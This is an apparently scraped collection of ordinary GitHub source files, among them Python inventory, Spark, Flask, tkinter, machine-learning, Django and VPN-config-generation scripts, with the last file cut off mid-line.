True\n\ndef id_valido(id_produto, database):\n\n for dicionario in database:\n if int(dicionario['ID']) == int(id_produto):\n return True\n print(\"ID não encontrado\")\n return False\n\ndef consultar_produto(id_produto,database):\n for dicionario in database:\n if int(dicionario['ID']) == int(id_produto):\n print(f'ID: {dicionario[\"ID\"]}')\n print(f'Nome: {dicionario[\"Nome\"]}')\n dados = dicionario[\"Especificações\"]\n txt = dados.split(\":\")\n txt.pop(-1)\n if len(txt) > 0:\n for dados in txt:\n dado = dados.split(\",\")\n print(f'{dado[0]}: {dado[1]}')\n print(f'Quantidade: {dicionario[\"Quantidade\"]}')\n if len(dicionario[\"Descrição\"].strip(\" \")) != 0:\n print(f'Descrição: {dicionario[\"Descrição\"]}')\n\ndef listar_produtos(database):\n if database != []:\n for dicionario in database:\n print(f'ID: {dicionario[\"ID\"]} | Nome: {dicionario[\"Nome\"]}.')\n print('\\n')\n else:\n print(\"Lista Vazia\")\n\n\ndef remove_cadastro(id_produto, database):\n for dicionario in database:\n if int(dicionario['ID']) == int(id_produto):\n database.remove(dicionario)\n print(f'Produto de ID: {id_produto} removido com sucesso. \\n')\n return database\n\n","repo_name":"fernandobrancher/DataScience-Course_project2","sub_path":"function_python.py","file_name":"function_python.py","file_ext":"py","file_size_in_byte":1726,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20771204011","text":"from __future__ import print_function\nimport sys\n\nfrom pyspark.sql import SparkSession\nfrom pyspark.sql.functions import col\n\n\nif __name__ == \"__main__\":\n spark = SparkSession\\\n .builder\\\n .appName(\"KMeansExample\")\\\n .getOrCreate()\n\n \n dataset = spark.read\\\n .format(\"csv\")\\\n .option(\"inferSchema\", \"true\")\\\n .option(\"header\", \"true\")\\\n .load(sys.argv[1]) \n \n time_df = dataset.select(col('Violation Time'), col('Summons Number'))\n df2=time_df.rdd.map(lambda x: ((str(int(x['Violation Time'][:2])+12) if x['Violation Time'][4]=='P' else x['Violation Time'][:2], x['Summons Number']))).toDF(['Violation Time','Summons Number'])\n df3 = df2.groupBy('Violation Time').count()\n df3=df3.sort(col('count').desc())\n\n df3_collect = df3.collect() \n\n for row in df3_collect:\n print(row['Violation Time'], row['count'])\n \n spark.stop()\n","repo_name":"1ellejade/spark-test","sub_path":"Q1-Part1/subq_1.py","file_name":"subq_1.py","file_ext":"py","file_size_in_byte":860,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"27749682717","text":"import logging\nimport traceback\nfrom typing import List\nfrom flask_mysqldb import MySQL\nfrom Repository.UsuariosRepository import UsuarioRepository\nfrom Entities.UsuarioEntity import UsuarioEntity\nfrom Utils.DTOs.UsuarioDTO import UsuarioDTO\nfrom Utils.DTOs.PersonaDTO import PersonaDTO\n\n\nclass UsuariosService:\n\n def __init__(self,\n usuarioRepository=UsuarioRepository(mysql=MySQL())):\n self.usuarioRepository = usuarioRepository\n\n def get_usuarios(self) -> List[UsuarioEntity] | None:\n try:\n try_users = self.usuarioRepository.join_personas()\n\n list_users = []\n\n for user in try_users:\n\n usuarioDTO = UsuarioDTO()\n personaDTO = PersonaDTO()\n\n personaDTO.persona_id = user[\"persona_id\"]\n personaDTO.telefono = user[\"telefono\"]\n personaDTO.apaterno = user[\"apaterno\"]\n personaDTO.amaterno = user[\"amaterno\"]\n personaDTO.nombre = user[\"nombre\"]\n personaDTO.genero = user[\"genero\"]\n usuarioDTO.usuario_id = user[\"usuario_id\"]\n usuarioDTO.persona = personaDTO\n usuarioDTO.rol = user[\"rol\"]\n usuarioDTO.email = user[\"email\"]\n usuarioDTO.token = user[\"token\"]\n usuarioDTO.isActive = user[\"isActive\"]\n usuarioDTO.acceptTerms = user[\"acceptTerms\"]\n usuarioDTO.acceptPrivacy = user[\"acceptPrivacy\"]\n usuarioDTO.acceptNewsletters = user[\"acceptNewsletters\"]\n usuarioDTO.createdAt = str(user[\"createdAt\"])\n\n list_users.append(usuarioDTO.toJSON())\n\n return list_users\n\n except Exception as e:\n logging.ERROR(traceback.format_exc())\n return e\n\n def get_usuarios_for_newsletter(self) -> List[UsuarioEntity] | None:\n try:\n try_users = self.usuarioRepository.join_personas_for_newsletter()\n\n list_users = []\n\n for user in try_users:\n\n usuarioDTO = UsuarioDTO()\n personaDTO = PersonaDTO()\n\n personaDTO.persona_id = user[\"persona_id\"]\n personaDTO.telefono = user[\"telefono\"]\n personaDTO.apaterno = user[\"apaterno\"]\n personaDTO.amaterno = user[\"amaterno\"]\n personaDTO.nombre = user[\"nombre\"]\n personaDTO.genero = user[\"genero\"]\n usuarioDTO.usuario_id = user[\"usuario_id\"]\n usuarioDTO.persona = personaDTO\n usuarioDTO.rol = user[\"rol\"]\n usuarioDTO.email = user[\"email\"]\n usuarioDTO.token = user[\"token\"]\n usuarioDTO.isActive = user[\"isActive\"]\n usuarioDTO.acceptTerms = user[\"acceptTerms\"]\n usuarioDTO.acceptPrivacy = user[\"acceptPrivacy\"]\n usuarioDTO.acceptNewsletters = user[\"acceptNewsletters\"]\n usuarioDTO.createdAt = str(user[\"createdAt\"])\n\n list_users.append(usuarioDTO.toJSON())\n\n return list_users\n\n except Exception as e:\n logging.ERROR(traceback.format_exc())\n return e\n\n def get_usuario(self, usuario_id: int) -> UsuarioEntity | None:\n try:\n\n usuario = self.usuarioRepository.join_persona(\n usuario_id=usuario_id)\n\n if usuario_id != None:\n usuarioDTO = UsuarioDTO()\n personaDTO = PersonaDTO()\n\n personaDTO.persona_id = usuario.persona_id.persona_id\n personaDTO.telefono = usuario.persona_id.telefono\n personaDTO.apaterno = usuario.persona_id.apaterno\n personaDTO.amaterno = usuario.persona_id.amaterno\n personaDTO.nombre = usuario.persona_id.nombre\n personaDTO.genero = usuario.persona_id.genero\n\n usuarioDTO.usuario_id = usuario.usuario_id\n usuarioDTO.persona = personaDTO\n usuarioDTO.rol = usuario.rol\n usuarioDTO.email = usuario.email\n usuarioDTO.token = usuario.token\n usuarioDTO.isActive = usuario.isActive\n usuarioDTO.acceptTerms = usuario.acceptTerms\n usuarioDTO.acceptPrivacy = usuario.acceptPrivacy\n usuarioDTO.acceptNewsletters = usuario.acceptNewsletters\n usuarioDTO.createdAt = str(usuario.createdAt)\n\n return usuarioDTO\n\n else:\n return None\n\n except Exception as e:\n logging.ERROR(traceback.format_exc())\n return e\n\n finally:\n usuarioDTO = None\n","repo_name":"LuisRaLo/technical-challenge-v202109","sub_path":"backend/src/Services/UsuariosService.py","file_name":"UsuariosService.py","file_ext":"py","file_size_in_byte":4717,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8044687584","text":"import tkinter as tk\n\nroot = tk.Tk()\nroot.title('Tkinter place Geometry Manager')\n\n# label 1\nlabel1 = tk.Label(\n root,\n text=\"Absolute placement\",\n bg='red',\n fg='white'\n)\n\nlabel1.place(x=20, y=10, width=200, height=150)\n\n# label 2\nlabel2 = tk.Label(\n root,\n text=\"Relative placement\",\n bg='blue',\n fg='white'\n)\n\nlabel2.place(relx=0.5, rely=0.5, relwidth=0.5, anchor='center')\n\nroot.mainloop()","repo_name":"iproduct/intro-python","sub_path":"07-tk-intro/demos/place01.py","file_name":"place01.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"21"} +{"seq_id":"31510916035","text":"import numpy as np\nimport os\nimport cv2\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.model_selection import GridSearchCV\nimport time\nimport matplotlib.pyplot as plt\n\nstart = time.process_time()\nres = 16\ntest_size = 2007\npath = \"./USPS_images\"\n\ndef resize_and_scale(img, size, scale):\n img = cv2.resize(img, size)\n return 1 - np.array(img, \"float32\") / scale\n\n\ndef process_train_data():\n '''TRAIN DATA'''\n path_to_data = os.path.join(path, \"train/\")\n img_list = os.listdir(path_to_data)\n sz = (res, res)\n validation_usps = []\n validation_usps_label = []\n validation_usps_count = []\n for name in img_list:\n if '.jpg' in name:\n img = cv2.imread(path_to_data + name)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n resized_img = resize_and_scale(img, sz, 255)\n label = name.split(\"_\")\n validation_usps.append(resized_img.flatten())\n validation_usps_label.append(label[0])\n validation_usps_count.append(label[1])\n\n validation_usps = np.array(validation_usps)\n validation_usps_label = np.array(validation_usps_label)\n validation_usps_count = np.array(validation_usps_count)\n return validation_usps, validation_usps_label, validation_usps_count\n\n\ndef process_test_data():\n '''TEST DATA'''\n path_to_data =os.path.join(path, \"test/\")\n img_list = os.listdir(path_to_data)\n sz = (res, res)\n validation_usps = []\n validation_usps_label = []\n validation_usps_count = []\n x_bitmap = []\n for name in img_list:\n if '.jpg' in name:\n img = cv2.imread(path_to_data + name)\n img = cv2.cvtColor(img, cv2.COLOR_BGR2GRAY)\n resized_img = resize_and_scale(img, sz, 255)\n validation_usps.append(resized_img.flatten())\n x_bitmap.append(resized_img)\n label = name.split(\"_\")\n validation_usps_label.append(label[0])\n validation_usps_count.append(label[1])\n validation_usps = np.array(validation_usps)\n validation_usps_label = np.array(validation_usps_label)\n validation_usps_count = np.array(validation_usps_count)\n return validation_usps, validation_usps_label, validation_usps_count, x_bitmap\n\n\ndef main():\n x_train, x_train_labels, x_train_count = process_train_data()\n x_test, x_test_correct_labels, x_test_count, x_bitmap = process_test_data()\n\n print(\"Data fetched succesfully!\")\n\n mlp = MLPClassifier(hidden_layer_sizes=(50,), activation='logistic', alpha=1e-4,\n solver='sgd', tol=1e-4, random_state=1, max_iter=500,\n learning_rate_init=.1, verbose=True, early_stopping=False)\n\n mlp.fit(x_train, x_train_labels)\n print(\"Training set score: %f\" % mlp.score(x_train, x_train_labels))\n\n predictions = mlp.predict(x_test)\n count = 0\n percentages = [[0 for i in range(10)] for j in range(2)]\n for i in range(test_size):\n percentages[0][int(x_test_correct_labels[i])] += 1\n if predictions[i] == x_test_correct_labels[i]:\n count += 1\n percentages[1][int(x_test_correct_labels[i])] += 1\n else:\n imgplot = plt.imshow(x_bitmap[i], cmap=\"Greys\")\n plt.title((\"Prediction:\", predictions[i], \" Correct Label: \", x_test_correct_labels[i],\n \" Pic number:\", x_test_count[i]))\n plt.show()\n\n print(\"Test accuracy: \", count / test_size)\n print(\"Wrong predictions: \", test_size - count, \"out of\", test_size)\n print(\"Correct predictions: \", count, \"out of\", test_size)\n for i in range(10):\n print(\"Digit:\", i, \": total:\", percentages[0][i], \"correct:\", percentages[1][i], \" accuracy:\",\n percentages[1][i] / percentages[0][i])\n\n\nmain()\nprint(\"Time elapsed: \", time.process_time() - start, \"seconds\")\n\n''' parameters = {'hidden_layer_sizes': [25, 50], 'activation': ('logistic', 'relu', 'tanh'),\n 'alpha': [0.01, 0.0001], 'solver': ('sgd', 'adam', 'lbfgs'), 'early_stopping': (False, True),\n 'warm_start': (True, False), 'max_iter':[500, 5000]}\n\n cv = GridSearchCV(estimator=MLPClassifier(), param_grid=parameters)\n cv.fit(x_train, x_train_labels)\n mlp = cv.best_estimator_\n print(\"Parameters of best estimator:\", cv.best_params_)'''\n","repo_name":"tarlaun/AI_Project","sub_path":"usps_digits.py","file_name":"usps_digits.py","file_ext":"py","file_size_in_byte":4318,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"74807953332","text":"# Dia 1.\n\ndef principal1():\n contador = 0\n print('Inicio Dia1-1')\n f1 = open(\"Day01_input.txt\", \"r\")\n anterior = None\n for l1 in f1:\n if anterior is not None:\n if int(l1) > anterior:\n contador = contador + 1\n print(f\"{int(l1)}>{anterior}, llevamos {contador}\")\n else:\n print(f\"{int(l1)}<={anterior}, llevamos {contador}\")\n anterior = int(l1)\n f1.close()\n print(f\"Fin Dia1-1 resultado: {contador}\")\n\ndef principal2():\n contador = 0\n print(f\"Inicio Dia1-2\")\n with open(\"Day01_input.txt\", \"r\") as f:\n content = [i.strip() for i in f.readlines()]\n\n for i in range(3, len(content)):\n # print(f\"{linea1}\")\n ultimo = int(content[i]) + int(content[i-1]) + int(content[i-2])\n anterior = int(content[i-1]) + int(content[i-2]) + int(content[i-3])\n print(f\"{anterior}={content[i-1]} {content[i-2]} {content[i-3]}\")\n print(f\"{ultimo}={content[i]} {content[i-1]} {content[i-2]}\")\n if ultimo > anterior:\n contador = contador + 1\n print(f\"{ultimo}>{anterior}, llevamos {contador}\")\n else:\n print(f\"{ultimo}<={anterior}, llevamos {contador}\")\n\n print(f\"Fin Dia1-2 resultado: {contador}\")\n\n\n# Press the green button in the gutter to run the script.\nif __name__ == '__main__':\n # principal1()\n principal2()\n# See PyCharm help at https://www.jetbrains.com/help/pycharm/\n\n","repo_name":"nmlacera/AdventCalendar2021","sub_path":"Day01.py","file_name":"Day01.py","file_ext":"py","file_size_in_byte":1463,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"37095931515","text":"from datasets import load_dataset\nimport numpy as np\nimport random\n\ndef transform_image(x):\n x = np.array(x)/255.0\n x = np.reshape(x, (784, 1))\n return x\n\ndef transform_label(y):\n y2 = np.zeros((10, 1))\n y2[y] = 1.0\n return y2\n\ndef load():\n mnist = load_dataset('mnist')\n\n X_train = [transform_image(x) for x in mnist['train']['image']]\n y_train = [transform_label(y) for y in mnist['train']['label']]\n data_train = (X_train, y_train)\n\n X_test = [transform_image(x) for x in mnist['test']['image']]\n y_test = [transform_label(y) for y in mnist['test']['label']]\n data_test = (X_test, y_test)\n\n return data_train, data_test\n\ndef output_to_digit(a):\n \"\"\"\n Hàm này sẽ chuyển dữ liệu từ đầu ra thành số\n nhận diện được để chúng ta dễ đọc\n \"\"\"\n return a.argmax(axis=0)[0]\n\ndef suffle(data):\n \"\"\"\n Trộn một tuple *data* theo thứ tự ngẫu nhiên \n nhưng vẫn giữ đúng nhãn của dữ liệu\n \"\"\"\n temp = list(zip(data[0], data[1]))\n random.shuffle(temp)\n X, y = zip(*temp) \n return (list(X), list(y))","repo_name":"ngovankhoa/tuhoctrituenhantao","sub_path":"nn/mnist.py","file_name":"mnist.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"vi","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"40633545141","text":"'''\nRead three integers and sort them in ascending order. \nAfter, print these values in ascending order, \na blank line and then the values in the sequence as they were readed.\n\nInput\nThe input contains three integer numbers.\n\nOutput\nPresent the output as requested above.\n\n\nInput Sample\t\n7 21 -14\n\nOutput Sample\n-14\n7\n21\n\n7\n21\n-14\n\nInput Sample\n-14 21 7\n\nOutput Sample\n-14\n7\n21\n\n-14\n21\n7\n'''\n\nn=list(map(int,input().split()))\n\nn_o=n.copy()\nn_o.sort()\nfor x in n_o:\n print(x)\nprint(\"\")\nfor y in n:\n print(y)\n","repo_name":"RafaelFN1230/BeeCrowd","sub_path":"Beginner/1042 - Simple Sort.py","file_name":"1042 - Simple Sort.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"8349472650","text":"#!/bin/env python\n\nimport os\nimport re\nimport uuid\nimport jinja2\n\nCONFIG_PATH = 'configs'\nOUTPUT_PATH = 'output'\nTEMPLATE_FILE = 'template.nmconnection'\n\nscriptdir = os.path.dirname(os.path.realpath(__file__))\ncertpath = os.path.join(scriptdir, CONFIG_PATH, 'ca.rsa.2048.crt')\n\nusername = raw_input('username: ')\npassword = raw_input('password: ')\n\ntemplateLoader = jinja2.FileSystemLoader(searchpath=\"./\")\ntemplateEnv = jinja2.Environment(loader=templateLoader)\ntemplate = templateEnv.get_template(TEMPLATE_FILE)\n\nos.mkdir(OUTPUT_PATH)\n\novpn_configs = [f for f in os.listdir(CONFIG_PATH) if 'ovpn' in f]\n\nfor filename in ovpn_configs:\n name = os.path.splitext(filename)[0]\n uuid_str = str(uuid.uuid1())\n fullpath = os.path.join(CONFIG_PATH, filename)\n with open(fullpath) as fp:\n while True:\n line = fp.readline()\n if not line:\n break\n matches = re.match(\"remote (.+) (\\d+)\", line)\n if matches:\n host = matches.group(1)\n port = matches.group(2)\n contents = template.render(username=username,\n password=password,\n certpath=certpath,\n name=name,\n uuid=uuid_str,\n host=host,\n port=port)\n filename_out = \"{}.nmconnection\".format(name)\n fullpath_out = os.path.join(OUTPUT_PATH, filename_out)\n with open(fullpath_out, 'w+') as fpo:\n fpo.write(contents)\n","repo_name":"erahhal/pia-openvpn","sub_path":"generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":1556,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"42061561407","text":"# -*- coding: iso-8859-15 -*-\n\nimport inspect,os,datetime\n\n# La finalidad de este módulo es gestionar las anotaciones en ficheros LOG y XML\n\n# Inicializa y vacía el fichero de LOG\ndef _clearLOG(logFILE=os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + \"\\\\pyLAUNCH.LOG\"):\n\t# Reseteo el fichero y lo inicializo (en blanco)\n\t_LOG = open(logFILE,\"w\")\n\t_LOG.write(str(datetime.datetime.now()).split()[0]+ \" > \" +logFILE+\"\\n\\n\")\n\t_LOG.close()\n\t\n# Añade una nueva línea al LOG\ndef _LOG(txt=\"\",dbug = True,logFILE=os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + \"\\\\pyLAUNCH.LOG\"):\n\tif (dbug or txt[:3] == \"ERR\"):\n\t\t_LOG = open(logFILE,\"a\")\n\t\t_LOG.write(str(datetime.datetime.now()).split()[1] +\" > \"+ txt+\"\\n\")\n\t\t_LOG.close()\n\n# Añade una nueva línea un fichero de texto cualquiera\ndef _writeTXT(txt=\"\",logFILE=\"\"):\n\tlogFILE = os.path.dirname(os.path.abspath(inspect.getfile(inspect.currentframe()))) + \"\\\\\" + logFILE\n\t_LOG = open(logFILE,\"a\")\n\t_LOG.write(txt+\"\\n\")\n\t_LOG.close()\n\n\t\n\t\n\t\n\t\t\n\n","repo_name":"wildfandango/pyLAUNCH","sub_path":"plfiles.py","file_name":"plfiles.py","file_ext":"py","file_size_in_byte":1037,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"3287559688","text":"from aiogram.dispatcher import FSMContext\nfrom aiogram.dispatcher.filters.state import State, StatesGroup\nfrom aiogram import types, Dispatcher\nfrom createbot import dp, bot, GLOBAL_PATH, db\n\n\nasync def command_admin(message: types.Message):\n msg_admin = message.text\n file_id = \"\"\n price = 0\n i = 0\n\n if msg_admin[:8] == \"Одобрить\": # Одобрить 15 40\n buffer = msg_admin[9:]\n while buffer[i] != \" \":\n file_id += buffer[i]\n i += 1\n price = buffer[i:]\n\n user_id = db.get_user_id(file_id)\n await bot.send_message(user_id, f\"Ваш файл одобрен!\\n Цена распечатки: {price} руб.\")\n\n elif msg_admin[9:] == \"Отклонить\": # Отклонить 15 Ты прислал чёрный лист!\n buffer = msg_admin[10:]\n reason = \"\"\n while buffer[i] != \" \":\n file_id += buffer[i]\n i += 1\n\n reason = buffer[i+1:]\n user_id = db.get_user_id(file_id)\n await bot.send_message(user_id, \"Ваш файл был отклонён! Причина:\\n\\\"\"+reason+\"\\\"\")\n # Отклонённый файл будет удалятся с бд\n # db.delete_file(file_id)\n\ndef register_handlers_admin(dp: Dispatcher):\n dp.register_message_handler(command_admin, is_chat_admin=True)\n","repo_name":"mEldevlp/tg-bot-nov-print-bot","sub_path":"handlers/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1360,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"28364388061","text":"from django.forms import ModelForm, formset_factory, Select\nfrom django import forms\nfrom django.core.exceptions import NON_FIELD_ERRORS\nfrom django.utils.translation import gettext_lazy as _\n\nfrom gestion_imprenta.models import SolicitudPresupuesto, SolicitudPresupuestoTerminaciones, Material, Cantidad,\\\n MedidaEstandar, Trabajo, Contacto, Cliente, ColorImpresion, Envio, Terminacion\n\n\nclass SolicitudPresupuestoForm(ModelForm):\n field_order = ['trabajo', 'material', 'color_impresion', 'medida_estandar', 'solicitud_orientacion',\n 'cantidad_estandar', 'solicitud_doble_cara_impresion_flg', 'solicitud_disenio_flg',\n 'solicitud_terminacion_flg', 'solicitud_adjunto_1', 'solicitud_adjunto_2', 'solicitud_adjunto_3',\n 'solicitud_express_flg', 'envio','solicitud_comentarios_cliente', 'doble_cara_flg' ]\n\n class Meta:\n model = SolicitudPresupuesto\n exclude = ['solicitud_email_enviado_flg',\n 'maquina_pliego',\n 'solicitud_terminaciones',\n 'contactos'\n ]\n\n labels = {\n 'solicitud_disenio_flg': _('Requiere diseño'),\n 'solicitud_comentarios_cliente': _('Comentarios adicionales'),\n 'solicitud_terminacion_flg': _('Requiere terminaciones'),\n 'solicitud_express_flg': _('Requiere prioridad (Express)'),\n 'solicitud_doble_cara_impresion_flg': _('Requiere impresión doble faz'),\n 'solicitud_adjunto_1': _('Suba su archivo (1)'),\n 'solicitud_adjunto_2': _('Suba su archivo (2)'),\n 'solicitud_adjunto_3': _('Suba su archivo (3)'),\n 'solicitud_orientacion': _('Orientación del trabajo'),\n 'trabajo': _('Seleccione el trabajo deseado'),\n 'color_impresion': _('Seleccione el color de impresión'),\n 'material': _('Seleccione el material'),\n 'envio': _('Seleccione el método de envío'),\n 'medida_estandar': _('Seleccione medida'),\n 'cantidad_estandar': _('Seleccion la cantidad')\n }\n\n help_texts = {\n 'solicitud_express_flg': _('Envío Express tiene costo adicional')\n }\n\n localized_fields = '__all__'\n\n\nclass SolicitudContactoForm(ModelForm):\n field_order = ['tipo_dato_contacto', 'dato_contacto_valor']\n prosp_nombre = forms.CharField(max_length=25, min_length=3, strip=True, label=_('Nombre'))\n prosp_apellido = forms.CharField(max_length=25, min_length=3, strip=True, label=_('Apellido'))\n\n class Meta:\n model = Contacto\n fields = ['tipo_dato_contacto', 'dato_contacto_valor']\n labels = {\n 'tipo_dato_contacto': _('Tipo de contacto'),\n 'dato_contacto_valor': _('Contacto')\n },\n localized_fields = '__all__'\n\n\nSpContactoFormset = formset_factory(\n form=SolicitudContactoForm,\n extra=1,\n max_num=2\n)\n\n\nclass SolicitudTerminacionesForm(ModelForm):\n field_order = ['terminacion', 'doble_cara_flg', 'comentarios']\n\n class Meta:\n model = SolicitudPresupuestoTerminaciones\n exclude = ['solicitud', 'maquina_terminacion']\n labels = {\n 'terminacion': _('Terminacion'),\n 'doble_cara_flg': _('Aplicar en ambas caras'),\n 'comentarios': _('Comentarios'),\n }\n localized_fields = '__all__'\n widgets = {\n 'terminacion': Select(attrs={'class': 'clase_terminacion'}),\n }\n\n\nSpTerminacionesFormset = formset_factory(\n form=SolicitudTerminacionesForm,\n extra=1,\n max_num=3\n)\n","repo_name":"Ceci1408/safetag_2019","sub_path":"safetag/gestion_clientes_pedidos/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":3598,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24926145555","text":"from django.contrib.auth.forms import UserCreationForm, UserChangeForm\nfrom django.forms.widgets import SelectDateWidget\nfrom .models import AccountsModel, TwitterAPIModel\n\n\nclass RegistrationUserForm(UserCreationForm):\n \"\"\" The Form for Sign up \"\"\"\n class Meta:\n model = AccountsModel\n fields = (\"username\", \"email\", \"password1\", \"password2\")\n\n\nclass AccountUpdateForm(UserChangeForm):\n \"\"\" Form for account updating \"\"\"\n class Meta:\n model = AccountsModel\n fields = ('email', 'username', 'first_name', 'last_name',\n 'gender', 'date_of_birth', 'avatar', 'twitter',\n 'mastodon', 'signal', 'github', 'telegram')\n widgets = {\"date_of_birth\": SelectDateWidget(years=range(1920, 2023))}\n\n def clean(self):\n \"\"\" If choose {Clear}: delete file \"\"\"\n cleaned_data = super().clean()\n avatar_clear = cleaned_data.get(\"avatar\")\n\n if avatar_clear is False:\n self.instance.avatar.delete(False)\n\n\nclass TwitterAPIForm(UserChangeForm):\n \"\"\" For update Social Media \"\"\"\n class Meta:\n model = TwitterAPIModel\n fields = ('consumer_key', 'consumer_secret', 'access_token', 'access_token_secret')\n","repo_name":"vomanc/Vomancus","sub_path":"project/account/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1220,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"39962444113","text":"from __future__ import print_function\nimport json\nimport os\nimport shutil\nimport subprocess\nimport zipfile\n\nprint(\"building host\")\ntry:\n os.remove(\"build/gpsio-installer.zip\")\nexcept:\n pass\n \nzipf=zipfile.ZipFile(\"build/gpsio-installer.zip\", \"w\", zipfile.ZIP_DEFLATED)\nhost_filenames = (\"install.py\",\"wrapper.py\",\"wrapper.bat\")\nfor filename in host_filenames:\n zipf.write(\"host/\" + filename, \"gpsio-installer/\" + filename)\nzipf.close()\n\nextension_filenames = (\"background.js\",\"content_script.js\",\"gps.png\",\"popup.html\",\"popup.js\")\ndef create_extension_zip(name, manifest):\n zipf=zipfile.ZipFile(\"build/\" + name + \".zip\", \"w\", zipfile.ZIP_DEFLATED)\n for filename in extension_filenames:\n zipf.write(\"extension/\" + filename, filename)\n zipf.writestr(\"manifest.json\", json.dumps(manifest))\n zipf.close()\n \nmanifest=json.loads(open('extension/manifest.json').read())\nprint(\"building extension zipfiles\")\ntry:\n os.remove(\"build/firefox-1.zip\")\n os.remove(\"build/firefox-2.zip\")\n os.remove(\"build/chrome-1.zip\")\n os.remove(\"build/chrome-2.zip\")\nexcept:\n pass\n\n\nmanifest.pop('key', None)\ncreate_extension_zip(\"firefox-1\", manifest)\n\nmanifest['applications']['gecko']['id']='gpsio2@caltopo.com'\nmanifest['content_scripts'][0]['matches'] = [\"https://caltopo.com/*\",\"http://caltopo.com/*\",\"https://sartopo.com/*\",\"http://sartopo.com/*\",\"http://localhost:8080/*\"]\ncreate_extension_zip(\"firefox-2\", manifest)\n\nmanifest.pop('applications', None)\ncreate_extension_zip(\"chrome-2\", manifest)\nmanifest['content_scripts'][0]['matches'] = [\"https://*/*\",\"http://*/*\"]\ncreate_extension_zip(\"chrome-1\", manifest)\n","repo_name":"kbisset/gpsio","sub_path":"build.py","file_name":"build.py","file_ext":"py","file_size_in_byte":1637,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"13000875397","text":"# Сложность алгоритма линейная O(N)\ndef task(array):\n try:\n for i in array:\n if i == 0 or i == '0':\n print(f'Индекс первого нуля {array.index(i)}')\n break\n else:\n print('В массиве нет нуля!')\n except AttributeError as e:\n print(f'{e} Неправильные данные')\n except TypeError as e:\n print(f'{e} Неправильные данные')\n\n\n# 2 вариант, но он на мой взгляд хуже, так как не все случаи отрабатывает, например если в списке будет не 0, а \"0\".\n# Но, возможно, в некоторых случаях может применяться. Приложил для примера.\n\n# def task(array):\n#\n# try:\n# if isinstance(array, str):\n# print(f'Индекс первого нуля {array.index(\"0\")}')\n# elif isinstance(array, list):\n# print(f'Индекс первого нуля {array.index(0)}')\n# else:\n# print('неправильные данные')\n# except ValueError:\n# print('В массиве нет нуля!')\n\n# Тесты\nif __name__ == '__main__':\n task([1, 3, \"0\", 4, 0])\n task([1, 3, 4])\n task([0, 1, 3, 4])\n task('1548440')\n task('15484')\n task((1, 2, 0))\n task({1, 2, 3, 0})\n","repo_name":"leget1987/test_task","sub_path":"task_1.py","file_name":"task_1.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"30257752546","text":"###############################################################################\r\n# Project: UMDLoop\r\n# Module: CodeSource\r\n# File: CodeSource.py\r\n###############################################################################\r\n# Purpose:\r\n#\r\n# This class will contain functions to generate a C source file\r\n# that defines code to build and send telemetry packets.\r\n###############################################################################\r\n# Change History:\r\n#\r\n# Author Date Description of Change\r\n# ---------- -------- --------------------------------------------------\r\n# Ryan W. 11-11-18 Initial version.\r\n###############################################################################\r\n\r\nimport re\r\nimport math\r\nfrom fractions import Fraction\r\nimport CodeHeader\r\n\r\ndef source_definition(tlm):\r\n source = imports()\r\n source += defines(tlm)\r\n source += main_thread(tlm)\r\n source += build_tlm(tlm)\r\n \r\n return source\r\n\r\ndef imports():\r\n imports = '#include <sys/socket.h>\\n'\r\n imports += '#include <string.h>\\n'\r\n imports += '#include <stdlib.h>\\n'\r\n imports += '#include <time.h>\\n'\r\n imports += '#include <errno.h>\\n'\r\n imports += '#include <stdio.h>\\n'\r\n imports += '#include \"spacex.h\"\\n'\r\n imports += '#include \"telemetry.h\"\\n\\n\\n'\r\n \r\n return imports\r\n\r\ndef defines(tlm):\r\n # Determine packet length\r\n pkt_length = 0\r\n for item in tlm.get_all():\r\n try:\r\n pkt_length += int(item.high_rate) * int(item.bit_length)\r\n except:\r\n pkt_length += int(item.bit_length)\r\n \r\n # Convert bits to bytes, round up\r\n pkt_length = math.ceil(pkt_length / 8)\r\n \r\n # Calculate packet period in nanoseconds\r\n total_ns = int(1000000000 / tlm.config[\"packet_frequency\"])\r\n \r\n defines = f'#define PKT_LENGTH {pkt_length}\\n'\r\n defines += f'#define TLM_FREQ {total_ns}L\\n'\r\n defines += '#define NS_IN_SEC 1000000000L\\n'\r\n defines += '#define UPDATE_DELAY(name) name.tv_sec = name.tv_sec + ((name.tv_nsec + TLM_FREQ) / NS_IN_SEC);\\\\\\n'\r\n defines += ' name.tv_nsec = (name.tv_nsec + TLM_FREQ) % NS_IN_SEC;\\n'\r\n defines += '#define INIT_TIMES(name, time) sec = 